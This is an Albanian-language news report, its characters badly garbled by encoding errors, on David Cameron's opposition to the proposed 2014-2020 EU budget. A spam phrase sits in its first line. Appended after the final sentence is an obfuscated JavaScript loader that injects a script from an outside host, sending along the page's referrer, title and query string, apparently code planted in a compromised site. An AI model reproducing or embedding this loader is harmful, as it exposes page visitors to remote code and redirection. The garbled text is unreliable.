largea_cameroon1353582028

Cameron kundA�r propozimeve pA�r buxhetin e BE-sA�

buy amsa fast. Kryeministri i BritanisA�, David Cameron, ka kritikuar propozimet pA�r buxhetin e BE-sA�, tA� cilat do tA� diskutohen sot dhe nesA�r nA� samitin e udhA�heqA�sve tA� unionit qA� zhvillohet nA� Bruksel.

a�?Nuk jam i kA�naqur aspak( me propozimet e fundit buxhetore). KA�to janA� negociata shumA� tA� rA�ndA�sishme. NA� kohA�n kur po marrim vendime tA� vA�shtira nA� vendin tonA�, mbi shpenzimet publike, do tA� ishte gabim, A�shtA� gabim, qA� tA� ketA� propozime pA�r rritjen e shpenzimeve nA� BE. Andaj ne do tA� zhvillojmA� negociata shumA� tA� vA�shtira pA�r njA� marrA�vehsje tA� mirA� pA�r taksapaguesit bitanikA� dhe pA�r taksapaguesit evropianA�a�?,tha kryeministri David Cameron.

Britania dhe kontribuesit tjerA� kryesore bA�jnA� thirrje pA�r shkurtime pA�r ta��iu pA�rshtatur reduktimeve qA� i kanA� bA�rA� nA� shpenzimet e tyre kombA�tare.

AnA�tarA�t mA� tA� varfA�ra tA� bllokut, siA� A�shtA� Polonia dhe vende tA� tjera ish-komuniste, kA�rkojnA� qA� buxheti pA�r 2014-2020 tA� mbahet nA� nivelet aktuale apo edhe tA� rritet.

Franca A�shtA� kundA�r shkurtimeve tA� propozuara nA� subvencionet bujqA�sore, ndA�rsa evndet e EvropA�s Lindore kundA�rshtojnA� reduktimin nA� financimin e pA�rmirA�simit tA� infrastrukturA�s, tA� njohur si shpenzime kohezioni.

PA�r kohezion shpenzohen rreth 32 pA�r qind tA� shpenzimeve totale, ndA�rsa pA�r bujqA�si 37.5 pA�r qind.

Drafti A�shtA� hartuar nga Presidenti i BE-sA�, Herman Van Rompuy, i cili bA�ri shkurtime nA� planin fillestar tA� Komisionit Evropian. Negociatat nA� Bruksel do tA� vazhdojnA� tA� premten.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}